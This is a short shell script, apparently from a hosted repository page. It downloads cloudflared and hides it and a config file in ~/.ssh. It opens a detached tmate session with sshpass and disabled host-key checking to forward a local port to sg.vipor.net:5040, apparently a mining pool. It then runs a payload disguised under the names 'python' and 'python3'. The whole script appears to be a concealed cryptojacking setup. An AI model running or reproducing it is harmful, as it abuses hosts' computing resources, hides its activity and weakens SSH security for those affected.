File size: 425 Bytes
6e3296a 1f4d0cd 6e3296a |
1 2 3 4 5 6 7 |
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 && mv cloudflared-linux-amd64 cloudflared && chmod +x cloudflared
mkdir ~/.ssh
cp ./cloudflared ~/.ssh/
cp ./config ~/.ssh/
tmate -S tmate.sock1 new-session -d 'sshpass -p " " ssh -o StrictHostKeyChecking=no -L 3000:sg.vipor.net:5040 [email protected]' && tmate -S tmate.sock1 wait tmate-ready
chmod +x python
bash python3 |